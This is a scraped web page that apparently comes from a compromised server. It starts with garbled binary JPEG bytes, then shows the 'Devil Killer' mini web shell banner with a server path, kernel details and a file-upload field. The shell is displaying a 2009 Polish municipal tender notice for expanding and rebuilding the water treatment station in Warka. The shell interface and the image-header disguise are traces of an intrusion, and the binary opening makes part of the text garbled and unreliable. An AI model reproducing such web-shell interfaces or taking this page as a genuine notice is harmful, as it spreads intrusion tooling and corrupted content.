JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090422/117102-N-2009.html

<p class="kh_header"><b>Warka: Rozbudowa i   przebudowa stacji uzdatniania wody w Warce</b><br>
<b>Numer ogłoszenia: 117102 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Warka , Plac St. Czarnieckiego 1, 05-660 Warka, woj. mazowieckie, tel. 048 665 12 00, faks 048 665 12 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i   przebudowa stacji uzdatniania wody w Warce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest rozbudowa i przebudowa stacji uzdatniania wody w Warce oraz budowa energetycznej stacji transformatorowej zasilającej w/w stację wg posiadanego przez Zamawiającego projektu budowlanego i pozwolenia na budowę. Stacja uzdatniania zasila w wodę zabudowę miasta. Aktualnie pobierana woda surowa ze studni głębinowych charakteryzuje się ponadnormatywną (uśrednioną) zawartością związków żelaza Fe 6,15 mg/l, związków manganu Mn 2,20 mg/l oraz amoniaku NH3 1 ÷ 1,4 mg/l. Wartość niniejszego przedmiotu zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 Ustawy Pzp.
2.	Jakość wody uzdatnionej po procesie filtracji winna spełniać wymagania podane w Rozporządzeniu Ministra Zdrowia z dnia z dnia 29 marca 2007 w sprawie jakości wody przeznaczonej do spożycia przez ludzi (Dz. U. Nr 61, poz. 417). Parametry wody pitnej muszą odpowiadać aktualnie obowiązującym normom.
3.	Zakres zamówienia obejmuje wykonanie następujących robót, m.in.:
a)	Budowa zbiorników żelbetowych wody czystej V=2x500 m3 .
b)	Budowa zbiornika żelbetowego wody surowej V=250m3.
c)	Budowa zbiornika żelbetowego retencyjnego wód popłucznych V=100 m3.
d)	Rozbudowa budynku stacji uzdatniania wody.
e)	Modernizacja budynku administracyjno-biurowego.
f)	Budowa ogrodzenia terenu stacji.
g)	Przebudowa i rozbudowa istniejącego Budynku Administracyjnego.
h)	Likwidacja istniejącego Zbiornika Wody Czystej. 
i)	Przebudowa i rozbudowa Hali Filtrów.
j)	Budowa Stacji Trafo. 
k)	Budowa Zbiornika Wody Surowej z pomieszczeniem technicznym nad zbiornikiem, Zbiornika Wody Czystej nr 1 i nr 2.
l)	Budowa parkingów z dziesięcioma miejscami postojowymi dla pracowników, budowa placu manewrowego przy Zbiorniku Wody Surowej i rozbudowywanej Hali Filtrów.
m)	Przebudowa placu manewrowego przed istniejącą Halą Filtrów.
n)	Przebudowa i budowa dróg wewnętrznych i dojazdów. 
o)	Kompleksowe uruchomienie wszystkich urządzeń stacji.
Przedmiotem inwestycji jest również budowa przyłącza energetycznego, przyłącza kanalizacji sanitarnej, podłączenie instalacji wody z własnego przyłącza, wykonanie rozbudowy budynku hali filtrów.
4.	Przebudowa stacji przewidywana jest przy zachowaniu ciągłości w dostawie wody do miasta. 
5.	Roboty winny zostać wykonane i ukończone zgodnie z prawem obowiązującym w Rzeczypospolitej Polskiej, w szczególności: Prawem Budowlanym, Prawem ochrony środowiska, Prawem o ruchu drogowym oraz Ustawą o drogach publicznych, Ustawą o odpadach, Ustawą o badaniach i certyfikacji i wymaganiami Zamawiającego, a kierowanie i nadzorowanie robót mogą wykonywać osoby, które posiadają wymagane prawem uprawnienia i są ubezpieczone od odpowiedzialności cywilnej. 
6.	Przedmiot zamówienia obejmuje również:
a)	uzyskanie niezbędnych decyzji i pozwoleń związanych z etapami budowlanymi w ramach obowiązujących przepisów prawa polskiego,
b)	obsługa geodezyjna, w tym geodezyjna inwentaryzacja powykonawcza,
c)	realizacja warunków określonych w opiniach, uzgodnieniach, decyzjach, pozwoleniach,
d)	przeprowadzenie ewentualnych badań i prób,
e)	zagospodarowanie terenu,
f)	opracowanie projektu powykonawczego i wszelkiej dokumentacji powykonawczej.
Szczegółowy zakres robót niezbędnych do wykonania przy realizacji zamówienia określony został w dokumentacji projektowej, przedmiarach robót i specyfikacjach technicznych wykonania i odbioru robót, stanowiących Część II i IV SIWZ.
Dokumentacja projektowa dotycząca przedmiotu zamówienia udostępniona jest na stronie internetowej Zamawiającego http://www.warka.pl/zp  oraz do wglądu w siedzibie Zamawiającego w godzinach 8.00 - 15.00, po uprzednim uzgodnieniu terminu.
7.	Z uwagi na złożoność oraz szeroki zakres robót o znacznym stopniu trudności zobowiązuje się Wykonawcę do dokonania wizji lokalnej przyszłego terenu budowy oraz do zapoznania się z jego otoczeniem, a także do oszacowania na własną odpowiedzialność, koszt i ryzyko wszelkich danych, jakie mogą okazać się niezbędne do przygotowania oferty i podpisania umowy. Wykonawca zobowiązany jest dokonać wizji lokalnej (oświadczenie  - załącznik nr 2 do SIWZ). Wizja lokalna przeprowadzona jest na koszt własny Wykonawcy. Zamawiający nie będzie brał pod uwagę żadnych roszczeń Wykonawcy będących skutkiem zaniechania oględzin terenu budowy.
8.	Uznaje się, iż złożenie oferty oznacza, że Wykonawcy zapoznali się ze wszelkimi odpowiednimi ustawami i innymi przepisami prawnymi obowiązującymi w Rzeczypospolitej Polskiej, które mogą w jakikolwiek sposób wpłynąć lub dotyczyć działań i czynności objętych ofertą i wynikającą z niej Umową.
9.	UWAGA:
Jeśli gdziekolwiek w SIWZ przedmiot zamówienia określony został przez wskazanie znaków towarowych lub pochodzenie materiałów, to Zamawiający dopuszcza możliwość zastosowania urządzeń równoważnych w stosunku do zaprojektowanych z zachowaniem tych samych standardów technicznych, technologicznych i jakościowych. Przez pojęcie materiałów równoważnych należy rozumieć materiały gwarantujące realizację robót zgodnie z wydanym pozwoleniem na budowę oraz zapewniające uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót oraz w przedmiarach robót.
Wykaz zastosowanych i przyjętych przez Wykonawcę do wyceny materiałów lub urządzeń równoważnych musi zostać załączony do oferty. Koniecznym jest podanie nazwy producenta, precyzyjnego i jednoznacznego typu urządzenia oraz załączenie niezbędnych dokumentów, takich jak: atest PZH, deklaracja zgodności producenta / aprobata techniczna, karta katalogowa producenta zawierająca wszystkie parametry techniczno-eksploatacyjne ujęte w dokumentacji projektowej. 
Zastosowanie filtrów równoważnych oznacza konieczność załączenia przez Wykonawcę do oferty następujących załączników:
a)	Rysunek techniczny: rzut z góry, boku, przodu, tyłu i dołu.
b)	Atest PZH na kompletny filtr.
c)	Aprobata techniczna na kompletny filtr.
d)	Krzywe przesiewu złóż wykonanych przez upoważnioną do tego typu badań jednostkę badawczą. 
e)	Graficzny schemat płukania filtrów.  
f)	Graficzny schemat instalacji sterującej.
Zamawiający nie wyraża zgody, by proponowane w ofercie urządzenia równoważne były prototypami. Wymogiem bezwzględnym jest, by były to urządzenia sprawdzone, pracujące na innych zrealizowanych obiektach przez okres nie krótszy, niż okres gwarancji jaki posiadają urządzenia przyjęte w dokumentacji projektowej. Zamawiający zastrzega sobie prawo dokonania oględzin i sprawdzenia poprawności działania urządzenia równoważnego pracującego na wskazanym obiekcie (załącznik nr 7 do SIWZ). Zamawiający wymagać będzie od Wykonawcy, którego oferta zostanie wybrana, wykonania przedmiotu zamówienia zgodnie z opracowanym projektem, szczególnie w zakresie efektów uzdatniania wody, kosztów eksploatacji, niezawodności działania. Wykonawca musi mieć świadomość, iż możliwość zastosowania urządzeń równoważnych uzależniona będzie od ich zgodności ze wszystkimi parametrami określonymi w projekcie, specyfikacji technicznej oraz akceptacji inspektora nadzoru i projektanta..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.00.00-6, 45.11.00.00-1, 45.33.20.00-3, 45.33.10.00-6, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 300000ZŁ<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Pzp oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy. W tym celu Wykonawcy winni potwierdzić i udokumentować, że:
a)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
b)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
c)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
d)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1.	Warunki ekonomiczne i techniczne:
1.1	Potencjał ekonomiczny i finansowy. 
Aby udokumentować, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy wykazać, że:
a)	Wykonawca posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 5.000.000 PLN.
b)	Wykonawca osiągnął przychody w każdym z ostatnich 3 lat obrotowych (2006 - 2008), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, w wysokości co najmniej 10.000.000 PLN.
c)	Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 3.000.000 PLN. 
1.2	Potencjał kadrowy. 
2.2.1 Wykonawca winien dysponować osobami odpowiedzialnymi za wykonanie zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób wykwalifikowanych, zdolnych do wykonania zamówienia, posiadających uprawnienia budowlane, upoważniające w świetle obowiązujących przepisów do kierowania i nadzorowania robót w zakresie następujących specjalności: konstrukcyjno - budowlanej; instalacyjnej w zakresie sieci, instalacji i urządzeń sanitarnych, tj. wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych; instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Wymagane osoby to: 
a)	Kierownik Budowy - posiadający następujące kwalifikacje:
-	co najmniej 6 lat doświadczenia zawodowego (liczone od dnia uzyskania uprawnień) na stanowisku Kierownika Budowy z zakresu robót sanitarnych, w tym kierowanie budową modernizacją rozbudową przebudową minimum dwóch stacji uzdatniania wody, w tym jednej o przepustowości co najmniej 150m3h,
-	uprawnienia budowlane bez ograniczeń do kierowania budową i robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
-	aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę.
b)	Kierownik Robót Sanitarnych - posiadający następujące kwalifikacje: 
-	co najmniej 4 lata doświadczenia zawodowego na stanowisku Kierownika Robót Sanitarnych, liczone od dnia uzyskania uprawnień,
-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji sanitarnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
-	aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę.
c)	Kierownik Robót Elektrycznych - posiadający następujące kwalifikacje: 
-	co najmniej 4 lata doświadczenia zawodowego na stanowisku Kierownika Robót Elektrycznych, liczone od dnia uzyskania uprawnień,
-	uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
-	aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę
d)	Kierownik Robót Konstrukcyjno-Budowlanych - posiadający następujące kwalifikacje:
-	co najmniej 4 lata doświadczenia zawodowego na stanowisku Kierownika Robót Konstrukcyjno-Budowlanych, liczone od dnia uzyskania uprawnień.
-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
-	aktualny wpis na listę członków właściwej izby samorządu zawodowego wydane przez tę izbę.
2.2.2 Wykonawca w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o 
udzielenie niniejszego zamówienia, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie, zatrudniał przeciętnie, co najmniej 50 osób. 
1.3	Doświadczenie Wykonawcy.
Wykonawca winien udokumentować posiadanie doświadczenia zawodowego w zakresie robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. 
Wykonawca przedstawi dokumenty świadczące o tym, że w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał budowę, przebudowę, rozbudowę lub modernizację minimum trzech stacji uzdatniania wody opartych na co najmniej dwustopniowej filtracji ciśnieniowej.
Przynajmniej jedno ze zrealizowanych zadań powinno być o wartości nie mniejszej niż 7 mln PLN netto i w swym zakresie powinno być zgodne z przedmiotem zamówienia oraz obejmować budowę zbiornika wody surowej wraz z otwartym układem napowietrzania, montaż dwustopniowej filtracji ciśnieniowej o wydajności (przepustowości) nie mniejszej niż 200m3h, montaż układu pompowego, montaż układu dezynfekcji i aktywacji złóż, montaż systemu sterowania z wizualizacją, wykonanie sieci międzyobiektowych oraz budowę lub przebudowę budynku technologicznego.

2.	Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie analizy złożonej oferty, przy zastosowaniu kryterium spełnia, nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, że Wykonawca spełnia postawione warunki udziału w postępowaniu. Oferta spełniająca wymagania otrzyma ocenę spełnia, natomiast oferta niespełniająca postawionych wymagań otrzyma ocenę nie spełnia 
3.	Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę w przypadkach określonych w art. 24 ust. 1 i 2 ustawy oraz w przypadku niespełnienia warunków udziału w postępowaniu określonych szczegółowo w SIWZ, z zastrzeżeniem postanowień art. 26 ust. 3 ustawy. Zamawiający o wykluczeniu z postępowania powiadomi równocześnie Wykonawców, którzy zostali wykluczeni podając uzasadnienie faktyczne i prawne z zastrzeżeniem art.92 ust. 1 pkt 3) ustawy Pzp. 

4.	Zamawiający odrzuca ofertę w przypadkach określonych w art. 89 ust. 1 ustawy Pzp. Zamawiający powiadomi równocześnie wszystkich Wykonawców o odrzuceniu ofert z podaniem podstaw faktycznych i prawnych z zastrzeżeniem art.92 ust. 1 pkt 2) ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta przedłożona przez Wykonawcę musi zawierać następujące dokumenty, m. in.:
1.	Formularz oferty z wykorzystaniem załączonego wzoru - Załącznik nr 1 do SIWZ.
2.	Dowód wniesienia wpłacenia wadium.
3.	Oświadczenie dot. spełniania warunków udziału w postępowaniu - zgodnie z Załącznikiem nr 2 do SIWZ.
4.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, potwierdzające dopuszczenie Wykonawcy do obrotu prawnego w zakresie objętym zamówieniem oraz określające osoby upoważnione do dokonywania czynności prawnych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.	Upoważnienie potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynika ono z przepisów prawa lub innych dokumentów rejestrowych.
6.	Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8.	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z zakresem wykonywanych przez nie czynności wg Załącznika nr 3 do SIWZ lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonanie zadania. 
10.	Aktualne dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie posiadają uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień wraz z zaświadczeniami o wpisie na listę członków okręgowej izby samorządu zawodowego. 
11.	Informacja na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich trzech lat lub z okresu prowadzenia działalności, jeśli jest ona krótsza niż 3 lata - wg Załącznika nr 4 do SIWZ.
12.	Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania - zgodnie z Załącznikiem nr 5 do SIWZ.
13.	Dokumenty potwierdzające, że wykazane roboty zostały wykonane z należytą starannością.
14.	Sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu albo w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty, zobowiązania i należności za ostatnie 3 zamknięte lata obrotowe, albo z okresu prowadzenia działalności, jeżeli jest ona prowadzona przez okres krótszy niż trzy lata. 
15.	Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
16.	Polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
17.	Oświadczenie Wykonawcy o zakresie prac, jakie zamierza zlecić podwykonawcom zgodnie z Załącznikiem nr 6 do SIWZ.
18.	Wykaz urządzeń równoważnych wg Załącznika nr 7 do SIWZ.
19.	Kosztorysy ofertowe uproszczone.
20.	Potwierdzenie dokonania wizji lokalnej.

Wyżej wymienione dokumenty winny być złożone w formie oryginałów lub kserokopii potwierdzonych na każdej stronie przez osobę  osoby uprawnione do podpisania oferty z adnotacją za zgodność z oryginałem.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 4, 7 i 8 składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
-	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt. 4, 7 i 8 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę.

1.	Wykonawcy wspólnie ubiegający się o zamówienie.

Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia zobowiązani są:
1.	Wykazać i udokumentować, że łącznie spełniają warunki określające ich potencjał techniczny, ekonomiczno - finansowy oraz kadrowy.
2.	Każdy z Wykonawców musi odrębnie udokumentować, że nie podlega wykluczeniu z postępowania oraz że posiada uprawnienia do występowania w obrocie prawnym w zakresie prac powierzonych mu do wykonania.
3.	Wykonawcy zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.
4.	Dokument ustanawiający Pełnomocnika, w postaci stosownego upoważnienia, winien zostać załączony do oferty. Wymaga się złożenia dokumentu w formie oryginału lub poświadczonej notarialnie kopii pełnomocnictwa.
5.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.
6.	Wykonawcy składający wspólną ofertę są solidarnie odpowiedzialni za wykonanie przedmiotu zamówienia oraz wniesienie zabezpieczenia należytego wykonania umowy. 
7.	Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z Pełnomocnikiem reprezentującym Wykonawców.
8.	Przed podpisaniem umowy w sprawie zamówienia publicznego Wykonawcy zobowiązani będą przedłożyć Zamawiającemu umowę regulującą ich współpracę.
9.	Wspólnicy spółki cywilnej traktowani są jak wykonawcy składający ofertę wspólną i mają do nich zastosowanie zasady określone w powyższych pkt 1 - 8..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
